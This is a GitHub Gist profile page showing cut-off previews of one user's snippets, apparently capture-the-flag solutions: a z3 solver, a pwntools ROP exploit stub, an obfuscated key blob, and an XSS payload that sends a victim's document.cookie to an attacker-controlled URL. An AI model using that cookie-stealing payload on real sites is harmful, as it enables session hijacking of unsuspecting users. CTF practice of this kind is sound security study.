Skip to content

Instantly share code, notes, and snippets.

View Adikso's full-sized avatar

Adam Zambrzycki Adikso

View GitHub Profile
import base64
import io
import paramiko
pke = b'^\x18\x1c\x19\x1fz|vx\x7fSzaq|kjy\x11a!|guf}\x19zth^\x18\x1c\x19\x1f2[\x02s]\x11[\x7fNS{\x08Cki\x18AU^wyxppp1r\x04BPUlppp2pSY\x0bMc`pp2tpusyxspp2w]CsyxpUK\x10\x07V@QV3\x7fYp2tpuE}xp`p2thqsTAe\x1aG>cK\x0c\x04\x7f\x0cb[V6\rADYHV\x06\x03{\\\\\x02gKPSDx\x1e*v\x01\x03xuP\x08eI\x1b\\zA\x02ln;\x08}&cwN|^U{\x7fyGGfb]NA]rE%{RN~N`PEr<\x01\tuT\x0b\x16xce\x1d]V~jW\x7fz\x04\x08$\x02\x01\rC^oxZW\x14W|P{\x7f\x0c\x08;W*\x03]sZZ\x12s[r\x05yKl\x00\n@|cZ dasDt\x00}\x05^\x04\x07hWcUr\x7f\tE\x00l~pE_N\x04\x1ak7~F~y@S\x07HI+b\x08XsM\t\x08\x1a;5Eg\x04|VUatGKQXbpt]IpI\x17\x1ayu^Sv\x1e\x01p\x1cxZY^\rCX\x00I\x1e^\x02\x7fAbh\x05DkD~vnym\\\x01b`K\x7ft\x06{}s\x7fF\tye\x7fS\x06jNgIt\x18_hW\x05I{K_k\x05\x0c@FVqnabU\x18aaQemN}ks\x02q[ny\x7f~\x02usXd\x03F\x03O|i\x00e+\x06ZSPPada\x06\n?WQg[^\x03v[2P\x1a\\\x0bO\x0cBv^\x14suy\\q\x01UbY\x1f`zW\x19\nhwEd\\\x1e\x1a\x06\x01h|f\x01\x07\x19Ss\x02TKKfx[:ahq{Z\x0ftaE\x18v;XCqXGTP?^wf\x0bRA\x07k\x1e=\x0cYYFmZXhS2ddE`\\lz\x07a<X\x04l|\x13ha\x02\x1a\x03\x03
from z3 import *
s = Solver()
t = BitVecs(' '.join([f'c{i}' for i in range(32)]), 8)
s.add(t[0x15] + t[1] + (t[0xb] - t[2]) + (t[0x11] - t[0xd]) + (t[8] - t[0xc]) + (t[5] - t[0x10]) == 0x62)
s.add((t[0x11] - t[9]) + t[4] + t[0xb] + (t[0x11] - t[1]) == 0xa6)
s.add((t[0x12] ^ t[0xc]) + (t[7] - t[0x12]) + (t[0x15] - t[0x13]) + (t[0x10] - t[0x15]) == 0x4b)
s.add((t[0xd] - t[0x13]) + (t[0xb] ^ t[0]) + (t[0xe] ^ t[0]) + (t[0x10] - t[0xe]) == 0x6a)
s.add((t[3] - t[0x11]) + (t[10] - t[0x14]) + (t[0xd] - t[8]) == 0x55)
from pwn import *
r = remote('dicec.tf', 31924)
elf = ELF('babyrop')
rop = ROP(elf)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc_write = libc.symbols['write']
<iframe id="sandbox" src="https://web-ide.dicec.tf/sandbox.html"></iframe>
<script>
const sandbox = document.querySelector('iframe');
const code = `
const subWindow = window.open("https://web-ide.dicec.tf/ide");
subWindow.onload = function () {
fetch("https://controlled.url/?x=" + subWindow.document.cookie);
}
`;
import urllib
import string
import re
import sys
import requests
base_url = "http://localhost:1337"
session = requests.Session()

Keybase proof

I hereby claim:

  • I am adikso on github.
  • I am adikso (https://keybase.io/adikso) on keybase.
  • I have a public key ASDLIngY89JLuEqHa9b6_GyQvtPFy-NRYXGfZSJHA-mh4Qo

To claim this, I am signing this object:

import os
from flask import current_app as app, jsonify
import sqlalchemy
db_user = os.environ.get('username')
db_pass = os.environ.get('password')
db_name = os.environ.get('name')
db_connection_name = os.environ.get('conn_name')
db = sqlalchemy.create_engine(
#include <iostream>
/*
* Running on Linux:
* LD_PRELOAD="libinjectcrypt.so" NecroDancer
*
* Running on OSX:
* DYLD_INSERT_LIBRARIES=libinjectcrypt.dylib NecroDancer
*
* Running on Windows: